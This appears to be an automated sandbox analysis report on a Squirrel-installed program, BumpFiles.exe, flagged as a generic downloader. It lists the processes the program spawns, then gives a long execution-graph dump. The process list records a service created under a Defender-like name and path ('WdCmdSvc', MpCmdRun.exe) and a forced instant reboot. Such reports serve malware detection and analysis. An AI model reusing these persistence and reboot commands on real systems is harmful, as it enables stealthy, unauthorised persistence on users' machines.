                                                                  Imagebase:0xb50000
                                                                  File size:1'899'520 bytes
                                                                  MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:15:43:19
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
                                                                  Imagebase:0xc10000
                                                                  File size:22'216 bytes
                                                                  MD5 hash:CC09BB7FDEFC5763CCB3CF7DAE2D76CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:15:43:20
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe"
                                                                  Imagebase:0xc10000
                                                                  File size:22'216 bytes
                                                                  MD5 hash:CC09BB7FDEFC5763CCB3CF7DAE2D76CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:15:43:27
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:15:43:27
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:15:43:27
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
                                                                  Imagebase:0x580000
                                                                  File size:61'440 bytes
                                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:15:43:36
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\SysWOW64\shutdown.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                                  Imagebase:0xee0000
                                                                  File size:23'552 bytes
                                                                  MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:15:43:36
                                                                  Start date:23/02/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:4.6%
                                                                    Total number of Nodes:1232
                                                                    Total number of Limit Nodes:31
                                                                    execution_graph 13291 22660b IUnknown_QueryInterface_Proxy 13292 226638 SysFreeString 13291->13292 13294 226694 VariantClear VariantClear VariantClear VariantClear 13292->13294 13295 22668e 13292->13295 13296 2266c6 13294->13296 13295->13294 13297 23d618 5 API calls 13296->13297 13298 2266e4 13297->13298 13299 22a70b 13300 22a714 13299->13300 13310 22ac7e IsProcessorFeaturePresent 13300->13310 13304 22a725 13309 22a729 13304->13309 13321 2320da 13304->13321 13307 22a740 13308 22c193 ___vcrt_uninitialize 8 API calls 13308->13309 13311 22a720 13310->13311 13312 22c16a 13311->13312 13313 22c16f ___vcrt_initialize_winapi_thunks 13312->13313 13324 22d329 13313->13324 13316 22c17d 13316->13304 13318 22c185 13319 22c190 13318->13319 13320 22d365 ___vcrt_uninitialize_locks DeleteCriticalSection 13318->13320 13319->13304 13320->13316 13353 23659b 13321->13353 13325 22d332 13324->13325 13327 22d35b 13325->13327 13328 22c179 13325->13328 13338 22d5b6 13325->13338 13329 22d365 ___vcrt_uninitialize_locks DeleteCriticalSection 13327->13329 13328->13316 13330 22c53e 13328->13330 13329->13328 13343 22d4c7 13330->13343 13333 22c553 13333->13318 13336 22c56e 13336->13318 13337 22c571 ___vcrt_uninitialize_ptd 6 API calls 13337->13333 13339 22d458 try_get_function 5 API calls 13338->13339 13340 22d5d0 13339->13340 13341 22d5ee InitializeCriticalSectionAndSpinCount 13340->13341 13342 22d5d9 13340->13342 13341->13342 13342->13325 13344 22d458 try_get_function 5 API calls 13343->13344 13345 22d4e1 13344->13345 13346 22d4fa TlsAlloc 13345->13346 13347 22c548 13345->13347 13347->13333 13348 22d578 13347->13348 13349 22d458 try_get_function 5 API calls 13348->13349 13350 22d592 13349->13350 13351 22d5ad TlsSetValue 13350->13351 13352 22c561 13350->13352 13351->13352 13352->13336 13352->13337 13354 2365ab 13353->13354 13355 22a732 13353->13355 13354->13355 13357 234719 13354->13357 13355->13307 13355->13308 13358 234725 ___DestructExceptionObject 13357->13358 13369 2351f0 EnterCriticalSection 13358->13369 13360 23472c 13370 2369e1 13360->13370 13362 23473b 13363 23474a 13362->13363 13381 2345ad GetStartupInfoW 13362->13381 13392 234766 13363->13392 13367 23475b _unexpected 13367->13354 13369->13360 13371 2369ed ___DestructExceptionObject 13370->13371 13372 2369f6 13371->13372 13373 236a0d 13371->13373 13376 22e082 pre_c_initialization 11 API calls 13372->13376 13395 2351f0 EnterCriticalSection 13373->13395 13375 236a19 13380 236a45 13375->13380 13396 23692f 13375->13396 13378 236a05 _unexpected 13376->13378 13378->13362 13403 236a6c 13380->13403 13382 23465e 13381->13382 13383 2345ca 13381->13383 13387 234665 13382->13387 13383->13382 13384 2369e1 17 API calls 13383->13384 13386 2345f2 13384->13386 13385 234622 GetFileType 13385->13386 13386->13382 13386->13385 13388 23466c 13387->13388 13389 2346af GetStdHandle 13388->13389 13390 234715 13388->13390 13391 2346c2 GetFileType 13388->13391 13389->13388 13390->13363 13391->13388 13411 235238 LeaveCriticalSection 13392->13411 13394 23476d 13394->13367 13395->13375 13397 23479b _unexpected 3 API calls 13396->13397 13398 236941 13397->13398 13402 23694e 13398->13402 13406 234b2e 13398->13406 13399 23363a _free 2 API calls 13401 2369a3 13399->13401 13401->13375 13402->13399 13410 235238 LeaveCriticalSection 13403->13410 13405 236a73 13405->13378 13407 234b4a 13406->13407 13408 234b68 InitializeCriticalSectionAndSpinCount 13407->13408 13409 234b53 13407->13409 13408->13409 13409->13398 13410->13405 13411->13394 14312 231d09 14315 231d27 14312->14315 14314 231d1a _unexpected 14318 235238 LeaveCriticalSection 14315->14318 14317 231d31 14317->14314 14318->14317 15657 23676c 15658 236781 15657->15658 15659 236775 15657->15659 15665 2367f4 15658->15665 15674 2351f0 EnterCriticalSection 15658->15674 15659->15658 15660 2367c8 15659->15660 15663 2367a4 _unexpected 15659->15663 15661 22e082 pre_c_initialization 11 API calls 15660->15661 15661->15663 15671 236864 15665->15671 15675 23673f 15665->15675 15668 2331d2 _unexpected 8 API calls 15672 2368b8 15668->15672 15670 23673f 8 API calls 15670->15671 15678 2368d2 15671->15678 15672->15663 15673 2331d2 _unexpected 8 API calls 15672->15673 15673->15663 15674->15665 15676 2331d2 _unexpected 8 API calls 15675->15676 15677 236744 15676->15677 15677->15670 15679 2368a9 15678->15679 15680 2368d8 15678->15680 15679->15663 15679->15668 15682 235238 LeaveCriticalSection 15680->15682 15682->15679 15691 232346 15694 2322d7 15691->15694 15693 23236b 15695 2322e3 ___DestructExceptionObject 15694->15695 15702 2351f0 EnterCriticalSection 15695->15702 15697 23231b 15707 23232f 15697->15707 15699 2322ed 15699->15697 15703 237314 15699->15703 15700 232327 _unexpected 15700->15693 15702->15699 15704 237322 _unexpected 15703->15704 15706 23732f 15703->15706 15705 23704f _unexpected 2 API calls 15704->15705 15704->15706 15705->15706 15706->15699 15710 235238 LeaveCriticalSection 15707->15710 15709 232339 15709->15700 15710->15709 15033 230da3 15035 230dad ___DestructExceptionObject 15033->15035 15034 230db4 15037 22e082 pre_c_initialization 11 API calls 15034->15037 15035->15034 15036 230dda 15035->15036 15044 2351f0 EnterCriticalSection 15036->15044 15041 230dc4 _unexpected 15037->15041 15039 230de5 15045 230e16 15039->15045 15044->15039 15046 230e24 15045->15046 15048 230df0 15046->15048 15052 234fca 15046->15052 15049 230e0d 15048->15049 15084 235238 LeaveCriticalSection 15049->15084 15051 230e14 15051->15041 15053 235078 15052->15053 15054 234fdf 15052->15054 15061 235091 15053->15061 15055 234fe6 15054->15055 15058 235007 15054->15058 15057 22e082 pre_c_initialization 11 API calls 15055->15057 15060 234ff6 15057->15060 15059 22e082 pre_c_initialization 11 API calls 15058->15059 15058->15060 15059->15060 15060->15046 15062 2350a8 15061->15062 15075 2350a1 15061->15075 15063 2350c8 15062->15063 15064 2350ae 15062->15064 15065 2350d0 15063->15065 15066 2350ea 15063->15066 15070 22e082 pre_c_initialization 11 API calls 15064->15070 15071 22e082 pre_c_initialization 11 API calls 15065->15071 15067 2350f4 15066->15067 15068 235109 15066->15068 15073 22e082 pre_c_initialization 11 API calls 15067->15073 15069 22eb97 __cftof 8 API calls 15068->15069 15072 235114 15069->15072 15070->15075 15071->15075 15072->15075 15076 23a736 15072->15076 15073->15075 15075->15060 15077 23a743 15076->15077 15079 23a782 15077->15079 15080 2349d2 15077->15080 15079->15075 15082 2349dd 15080->15082 15081 2349e3 15081->15079 15082->15081 15083 234a23 CompareStringW 15082->15083 15083->15081 15084->15051 13482 2264bd 13483 2264c9 __EH_prolog3_GS 13482->13483 13490 22635a 13483->13490 13486 23d618 5 API calls 13487 226539 13486->13487 13488 226511 13488->13486 13489 226501 IUnknown_QueryInterface_Proxy 13489->13488 13491 226366 __EH_prolog3_GS 13490->13491 13492 226387 VariantInit 13491->13492 13493 2263c8 13492->13493 13494 2263e5 IUnknown_QueryInterface_Proxy 13493->13494 13496 226481 VariantClear VariantClear 13493->13496 13501 226400 13493->13501 13494->13501 13497 2264af 13496->13497 13498 23d618 5 API calls 13497->13498 13499 2264bc 13498->13499 13499->13488 13499->13489 13500 22647b IUnknown_Release_Proxy 13500->13496 13501->13496 13501->13500 15411 236687 15414 235238 LeaveCriticalSection 15411->15414 15413 23668c 15414->15413 13878 229c84 13879 229c8e 13878->13879 13880 22a090 ___delayLoadHelper2@8 14 API calls 13879->13880 13880->13879 13288 231684 13289 23151e 13 API calls 13288->13289 13290 231695 13289->13290 15737 236788 15738 23678d 15737->15738 15740 236797 15737->15740 15739 2367c8 15738->15739 15738->15740 15741 22e082 pre_c_initialization 11 API calls 15739->15741 15744 2367f4 15740->15744 15754 2351f0 EnterCriticalSection 15740->15754 15745 2367b2 _unexpected 15741->15745 15743 2368d2 LeaveCriticalSection 15746 2368a9 15743->15746 15747 23673f 8 API calls 15744->15747 15752 236864 15744->15752 15746->15745 15748 2331d2 _unexpected 8 API calls 15746->15748 15749 23685a 15747->15749 15750 2368b8 15748->15750 15751 23673f 8 API calls 15749->15751 15750->15745 15753 2331d2 _unexpected 8 API calls 15750->15753 15751->15752 15752->15743 15753->15745 15754->15744 13412 229d8e 13413 229d5a 13412->13413 13415 22a090 13413->13415 13441 229df1 13415->13441 13417 22a0a0 13418 22a0fd 13417->13418 13425 22a121 13417->13425 13450 22a02e 13418->13450 13421 22a199 LoadLibraryExA 13422 22a1fa 13421->13422 13423 22a1ac GetLastError 13421->13423 13424 22a205 FreeLibrary 13422->13424 13429 22a20c 13422->13429 13426 22a1d5 13423->13426 13427 22a1bf 13423->13427 13424->13429 13425->13421 13425->13422 13425->13429 13430 22a2c8 13425->13430 13432 22a02e DloadReleaseSectionWriteAccess 6 API calls 13426->13432 13427->13422 13427->13426 13428 22a26a GetProcAddress 13428->13430 13431 22a27a GetLastError 13428->13431 13429->13428 13429->13430 13434 22a02e DloadReleaseSectionWriteAccess 6 API calls 13430->13434 13433 22a28d 13431->13433 13435 22a1e0 RaiseException 13432->13435 13433->13430 13437 22a02e DloadReleaseSectionWriteAccess 6 API calls 13433->13437 13436 22a2f6 13434->13436 13435->13436 13436->13413 13438 22a2ae RaiseException 13437->13438 13439 229df1 DloadAcquireSectionWriteAccess 6 API calls 13438->13439 13440 22a2c5 13439->13440 13440->13430 13442 229e23 13441->13442 13443 229dfd 13441->13443 13442->13417 13458 229e97 13443->13458 13446 229e1e 13466 229e24 13446->13466 13451 22a062 RaiseException 13450->13451 13452 22a040 13450->13452 13451->13436 13453 229e97 DloadAcquireSectionWriteAccess 3 API calls 13452->13453 13454 22a045 13453->13454 13455 22a05d 13454->13455 13456 229fc0 DloadProtectSection 3 API calls 13454->13456 13476 22a064 13455->13476 13456->13455 13459 229e24 DloadGetSRWLockFunctionPointers 3 API calls 13458->13459 13460 229e02 13459->13460 13460->13446 13461 229fc0 13460->13461 13462 229fd5 DloadObtainSection 13461->13462 13463 22a010 VirtualProtect 13462->13463 13464 229fdb 13462->13464 13472 229ed6 VirtualQuery 13462->13472 13463->13464 13464->13446 13467 229e32 13466->13467 13468 229e47 13466->13468 13467->13468 13469 229e36 GetModuleHandleW 13467->13469 13468->13417 13469->13468 13470 229e4b GetProcAddress 13469->13470 13470->13468 13471 229e5b GetProcAddress 13470->13471 13471->13468 13473 229ef1 13472->13473 13474 229f33 13473->13474 13475 229efc GetSystemInfo 13473->13475 13474->13463 13475->13474 13477 229e24 DloadGetSRWLockFunctionPointers 3 API calls 13476->13477 13478 22a069 13477->13478 13478->13451 15190 236592 15191 2365ab 15190->15191 15192 2365c9 15190->15192 15191->15192 15193 234719 21 API calls 15191->15193 15193->15191 12375 22aa90 12376 22aa9e ___scrt_is_nonwritable_in_current_image 12375->12376 12387 22af3f 12376->12387 12378 22aac3 12391 227326 12378->12391 12383 22aaec 12441 22a89a 12383->12441 12447 22c010 12387->12447 12390 22af65 12390->12378 12449 23da10 12391->12449 12394 227370 12451 2271ef 12394->12451 12398 22738c 12399 2273a0 12398->12399 12400 2273cc CoInitialize InitCommonControlsEx 12398->12400 12535 2223d9 12399->12535 12490 22a648 12400->12490 12403 2273fb ___scrt_fastfail 12500 22757b 12403->12500 12408 227577 12436 22af78 GetModuleHandleW 12408->12436 12410 22741d 12508 2262d8 GetCurrentProcess OpenProcessToken 12410->12508 12412 227491 12516 222304 12412->12516 12413 22743b 12413->12412 12414 227463 12413->12414 12416 2222a6 18 API calls 12414->12416 12418 227473 12416->12418 12550 226221 12418->12550 12424 2274c2 12556 2212ec 12424->12556 12425 2274fd 12426 227505 GetModuleHandleW GetModuleFileNameW 12425->12426 12432 22747c 12425->12432 12426->12432 12429 2274d3 12431 2222a6 18 API calls 12429->12431 12430 2274fb 12430->12425 12430->12432 12433 2274e5 12431->12433 12588 22a3ad 12432->12588 12434 226221 8 API calls 12433->12434 12435 2274ee 12434->12435 12435->12432 12437 22aadf 12436->12437 12437->12383 12438 231639 12437->12438 13111 23151e 12438->13111 12442 22a8a6 12441->12442 12443 22a8bc 12442->12443 13176 2320ec 12442->13176 12445 22a8b4 13181 22c193 12445->13181 12448 22af52 GetStartupInfoW 12447->12448 12448->12390 12450 227333 SetDefaultDllDirectories LoadLibraryW GetProcAddress 12449->12450 12450->12394 12595 23d66e 12451->12595 12453 2271fe GetSystemDirectoryW 12596 227615 12453->12596 12455 227222 12600 227688 12455->12600 12457 227238 12604 2275ea 12457->12604 12460 227615 17 API calls 12461 22725a 12460->12461 12462 227688 22 API calls 12461->12462 12463 227270 12462->12463 12464 2275ea 11 API calls 12463->12464 12465 227280 12464->12465 12466 227615 17 API calls 12465->12466 12467 227292 12466->12467 12468 227688 22 API calls 12467->12468 12469 2272a8 12468->12469 12470 2275ea 11 API calls 12469->12470 12471 2272b4 LoadLibraryW LoadLibraryW LoadLibraryW 12470->12471 12472 2275ea 11 API calls 12471->12472 12473 22730a 12472->12473 12474 2275ea 11 API calls 12473->12474 12475 227315 12474->12475 12476 2275ea 11 API calls 12475->12476 12477 227320 12476->12477 12608 23d618 12477->12608 12479 227325 12480 2222a6 12479->12480 12481 2222bb 12480->12481 12486 2222ce 12480->12486 12482 2222d0 lstrlenW 12481->12482 12483 2222c5 12481->12483 12485 2222de 12482->12485 12482->12486 12727 221fce 12483->12727 12740 222157 12485->12740 12486->12398 12488 2222e6 12488->12486 12744 22222b 12488->12744 12494 22a64d 12490->12494 12491 230c66 ___std_exception_copy 3 API calls 12491->12494 12492 22a667 12492->12403 12493 231200 _unexpected 2 API calls 12493->12494 12494->12491 12494->12492 12494->12493 12496 22a669 12494->12496 12495 22ac53 12497 22c3d9 __CxxThrowException@8 RaiseException 12495->12497 12496->12495 12498 22c3d9 __CxxThrowException@8 RaiseException 12496->12498 12499 22ac70 12497->12499 12498->12495 12499->12403 12819 221bdc InitializeCriticalSectionEx 12500->12819 12503 229afd 12504 229b09 __EH_prolog3_catch 12503->12504 12505 229b3b GetCurrentThreadId 12504->12505 12506 22a648 4 API calls 12505->12506 12507 229b51 12506->12507 12507->12410 12509 226304 GetLastError 12508->12509 12510 22631a GetTokenInformation 12508->12510 12511 226333 12509->12511 12510->12509 12510->12511 12512 226342 CloseHandle 12511->12512 12513 22634b 12511->12513 12512->12513 12514 22a3ad CatchGuardHandler 5 API calls 12513->12514 12515 226358 12514->12515 12515->12413 12517 22c010 ___scrt_fastfail 12516->12517 12518 22234f VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 12517->12518 12519 22a3ad CatchGuardHandler 5 API calls 12518->12519 12520 2223b5 12519->12520 12520->12432 12521 221050 FindResourceW LoadResource 12520->12521 12522 2222a6 18 API calls 12521->12522 12523 221087 12522->12523 12524 22a3ad CatchGuardHandler 5 API calls 12523->12524 12525 22115d 12524->12525 12526 22115f 12525->12526 12822 221dff 12526->12822 12529 221199 RegQueryValueExW 12534 2211c2 12529->12534 12532 22a3ad CatchGuardHandler 5 API calls 12533 2211f2 12532->12533 12533->12424 12533->12425 12832 221e76 12534->12832 12841 23d66e 12535->12841 12537 2223e8 GetModuleHandleW GetModuleFileNameW 12538 2222a6 18 API calls 12537->12538 12539 22241c _wcsrchr 12538->12539 12540 2222a6 18 API calls 12539->12540 12541 22245a 12540->12541 12842 222641 lstrlenW 12541->12842 12543 22246b 12543->12543 12857 2223b7 GetFileAttributesW 12543->12857 12545 2225c7 12547 23d618 5 API calls 12545->12547 12548 2225ef 12547->12548 12548->12400 12548->12432 12549 2223b7 2 API calls 12549->12545 12551 226246 ___scrt_fastfail 12550->12551 12866 221a3f 12551->12866 12554 22a3ad CatchGuardHandler 5 API calls 12555 2262d6 12554->12555 12555->12432 12564 2212fb __EH_prolog3_GS ___scrt_fastfail 12556->12564 12557 221401 ___scrt_fastfail 12558 221fce 17 API calls 12557->12558 12573 22140d 12557->12573 12559 221492 GetTempPathW 12558->12559 12560 2214b3 12559->12560 12561 2214a9 12559->12561 12563 2214c1 GetTempFileNameW 12560->12563 12565 2214ae 12560->12565 12873 221c76 GetLastError 12561->12873 12563->12561 12566 2214e0 12563->12566 12564->12557 12571 221a3f 3 API calls 12564->12571 12567 221727 12565->12567 12569 221720 CloseHandle 12565->12569 12874 22e16f 12566->12874 12570 221731 DeleteFileW 12567->12570 12567->12573 12569->12567 12570->12573 12571->12557 12572 2214fd _wcsrchr 12572->12565 12574 2216ee 12572->12574 12575 22152d 12572->12575 12577 23d618 5 API calls 12573->12577 12576 22e16f 11 API calls 12574->12576 12878 22e1d3 12575->12878 12579 2216cc 12576->12579 12580 221772 12577->12580 12579->12565 12888 221773 12579->12888 12580->12429 12580->12430 12582 221541 MoveFileW 12582->12561 12585 22155d 12582->12585 12584 2216a3 WaitForSingleObject GetExitCodeProcess 12584->12561 12584->12579 12587 2215d4 12585->12587 12882 221b0b 12585->12882 12587->12561 12587->12565 12587->12584 12589 22a3b6 12588->12589 12590 22a3b8 IsProcessorFeaturePresent 12588->12590 12589->12408 12592 22a42b 12590->12592 13110 22a3ef SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12592->13110 12594 22a50e 12594->12408 12595->12453 12597 227634 12596->12597 12599 227648 12597->12599 12611 227725 12597->12611 12599->12455 12601 22769f 12600->12601 12601->12601 12602 2276ba 12601->12602 12691 2277ef 12601->12691 12602->12457 12605 227248 12604->12605 12606 2275f5 12604->12606 12605->12460 12607 22703e 11 API calls 12606->12607 12607->12605 12609 22a3ad CatchGuardHandler 5 API calls 12608->12609 12610 23d623 12609->12610 12610->12610 12612 2277a7 12611->12612 12613 22773f 12611->12613 12632 2277ad 12612->12632 12620 2270be 12613->12620 12617 227765 12618 22779c 12617->12618 12627 22703e 12617->12627 12618->12599 12621 2270c6 12620->12621 12622 2270d7 12620->12622 12623 22a648 4 API calls 12621->12623 12624 2270de 12622->12624 12625 22a648 4 API calls 12622->12625 12623->12622 12624->12617 12626 2270f7 12625->12626 12626->12617 12628 227046 12627->12628 12629 227057 Mailbox 12627->12629 12628->12629 12635 22e092 12628->12635 12629->12618 12657 22b256 12632->12657 12640 22e01e 12635->12640 12637 22e0a1 12647 22e0af IsProcessorFeaturePresent 12637->12647 12639 22e0ae 12641 22e029 12640->12641 12642 22e0af pre_c_initialization 11 API calls 12641->12642 12644 22e037 12641->12644 12643 22e081 12642->12643 12645 22e01e pre_c_initialization 11 API calls 12643->12645 12644->12637 12646 22e08e 12645->12646 12646->12637 12648 22e0bb 12647->12648 12651 22ded4 12648->12651 12652 22def0 ___scrt_fastfail 12651->12652 12653 22df1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12652->12653 12654 22dfed ___scrt_fastfail 12653->12654 12655 22a3ad CatchGuardHandler 5 API calls 12654->12655 12656 22e00b GetCurrentProcess TerminateProcess 12655->12656 12656->12639 12662 22b21c 12657->12662 12661 22b275 12668 22b1cc 12662->12668 12665 22c3d9 12666 22c3f9 RaiseException 12665->12666 12666->12661 12671 22c357 12668->12671 12672 22c364 12671->12672 12678 22b1f8 12671->12678 12672->12678 12679 230c66 12672->12679 12674 22c381 12675 22c391 12674->12675 12684 230c71 12674->12684 12688 230c49 12675->12688 12678->12665 12682 233674 _unexpected 12679->12682 12680 23369d HeapAlloc 12681 2336b0 12680->12681 12680->12682 12681->12674 12682->12680 12682->12681 12683 231200 _unexpected EnterCriticalSection LeaveCriticalSection 12682->12683 12683->12682 12687 230c7e 12684->12687 12685 22e082 pre_c_initialization 11 API calls 12686 230c9e 12685->12686 12686->12675 12687->12685 12687->12686 12689 23363a _free HeapFree GetLastError 12688->12689 12690 230c61 12689->12690 12690->12678 12692 2278db 12691->12692 12693 227818 12691->12693 12694 2277ad 17 API calls 12692->12694 12696 2270be 4 API calls 12693->12696 12695 2278e0 12694->12695 12702 22998c 12695->12702 12698 22784b 12696->12698 12700 22703e 11 API calls 12698->12700 12701 2278af 12698->12701 12699 2278f2 Mailbox 12699->12602 12700->12701 12701->12602 12703 2299ea 12702->12703 12704 22999e 12702->12704 12703->12699 12706 2299ef 12704->12706 12708 2299a7 Mailbox 12704->12708 12705 2299de DeleteCriticalSection 12705->12703 12723 229977 RaiseException 12706->12723 12708->12705 12709 2299fb EnterCriticalSection 12712 229a26 12709->12712 12711 229a5f LeaveCriticalSection 12724 229960 12711->12724 12712->12711 12713 229a49 Mailbox 12712->12713 12715 230c49 ___vcrt_freefls@4 2 API calls 12712->12715 12713->12711 12715->12713 12717 229a89 12719 230c49 ___vcrt_freefls@4 2 API calls 12717->12719 12720 229a99 Mailbox 12717->12720 12718 230c49 ___vcrt_freefls@4 2 API calls 12718->12717 12719->12720 12721 22998c 4 API calls 12720->12721 12722 229af8 12721->12722 12722->12699 12723->12709 12725 229975 12724->12725 12726 229969 LeaveCriticalSection 12724->12726 12725->12717 12725->12718 12725->12720 12726->12725 12728 221ff9 ___scrt_fastfail 12727->12728 12729 22202e 12728->12729 12734 222041 Mailbox 12728->12734 12753 221ef4 12729->12753 12731 22203c 12733 22a3ad CatchGuardHandler 5 API calls 12731->12733 12732 222157 4 API calls 12732->12734 12736 222153 12733->12736 12734->12732 12735 22211f 12734->12735 12738 22222b 12 API calls 12734->12738 12760 221f8d 12735->12760 12736->12486 12738->12734 12741 222163 __EH_prolog3_catch 12740->12741 12743 22216f 12741->12743 12766 22a3e1 12741->12766 12743->12488 12745 222239 12744->12745 12749 22224c 12744->12749 12747 22223d 12745->12747 12751 22224e ___scrt_fastfail 12745->12751 12790 22e082 12747->12790 12748 2222a1 12748->12486 12793 2221f0 12749->12793 12751->12749 12752 22e082 pre_c_initialization 11 API calls 12751->12752 12752->12749 12754 221f05 lstrlenW 12753->12754 12756 221f01 12753->12756 12754->12756 12755 221f2c 12757 22222b 12 API calls 12755->12757 12758 221f42 12755->12758 12756->12755 12759 222157 4 API calls 12756->12759 12757->12758 12758->12731 12759->12755 12761 221f99 12760->12761 12765 221fc9 lstrlenW 12760->12765 12762 222157 4 API calls 12761->12762 12763 221fa8 12762->12763 12764 22222b 12 API calls 12763->12764 12763->12765 12764->12765 12765->12731 12768 22a648 12766->12768 12767 230c66 ___std_exception_copy 3 API calls 12767->12768 12768->12767 12769 22a667 12768->12769 12772 22a669 12768->12772 12776 231200 12768->12776 12769->12743 12771 22ac53 12773 22c3d9 __CxxThrowException@8 RaiseException 12771->12773 12772->12771 12774 22c3d9 __CxxThrowException@8 RaiseException 12772->12774 12775 22ac70 12773->12775 12774->12771 12775->12743 12779 23122d 12776->12779 12778 23120b 12778->12768 12780 231239 ___DestructExceptionObject 12779->12780 12785 2351f0 EnterCriticalSection 12780->12785 12782 231244 12786 231276 12782->12786 12784 23126b _unexpected 12784->12778 12785->12782 12789 235238 LeaveCriticalSection 12786->12789 12788 23127d 12788->12784 12789->12788 12791 22e01e pre_c_initialization 11 API calls 12790->12791 12792 22e08e 12791->12792 12792->12749 12794 22220e 12793->12794 12795 2221fa 12793->12795 12794->12748 12795->12794 12805 2221d4 12795->12805 12797 22222a 12799 22223d 12797->12799 12801 22224c 12797->12801 12803 22224e ___scrt_fastfail 12797->12803 12798 2221f0 12 API calls 12800 2222a1 12798->12800 12802 22e082 pre_c_initialization 11 API calls 12799->12802 12800->12748 12801->12798 12802->12801 12803->12801 12804 22e082 pre_c_initialization 11 API calls 12803->12804 12804->12801 12806 2221e2 12805->12806 12807 22c3d9 __CxxThrowException@8 RaiseException 12806->12807 12809 2221ef 12807->12809 12808 22220e 12808->12797 12809->12808 12810 2221d4 12 API calls 12809->12810 12811 22222a 12810->12811 12813 22223d 12811->12813 12815 22224c 12811->12815 12817 22224e ___scrt_fastfail 12811->12817 12812 2221f0 12 API calls 12814 2222a1 12812->12814 12816 22e082 pre_c_initialization 11 API calls 12813->12816 12814->12797 12815->12812 12816->12815 12817->12815 12818 22e082 pre_c_initialization 11 API calls 12817->12818 12818->12815 12820 221c00 12819->12820 12821 221bec GetLastError 12819->12821 12820->12503 12821->12820 12823 221e23 12822->12823 12824 221e35 RegOpenKeyExW 12822->12824 12835 221d9c 12823->12835 12826 221e47 12824->12826 12828 221e54 12826->12828 12829 221e76 RegCloseKey 12826->12829 12830 22a3ad CatchGuardHandler 5 API calls 12828->12830 12829->12828 12831 221195 12830->12831 12831->12529 12831->12534 12833 2211e4 12832->12833 12834 221e7f RegCloseKey 12832->12834 12833->12532 12834->12833 12836 221da9 GetModuleHandleW 12835->12836 12837 221ddc 12835->12837 12839 221dc8 12836->12839 12840 221db8 GetProcAddress 12836->12840 12838 221de1 RegOpenKeyExW 12837->12838 12837->12839 12838->12839 12839->12826 12840->12839 12841->12537 12843 222666 lstrlenW 12842->12843 12850 222707 12842->12850 12844 222689 _wcsstr 12843->12844 12843->12850 12845 2226b5 lstrlenW 12844->12845 12845->12844 12846 2226c7 12845->12846 12847 221f8d 15 API calls 12846->12847 12846->12850 12848 2226d9 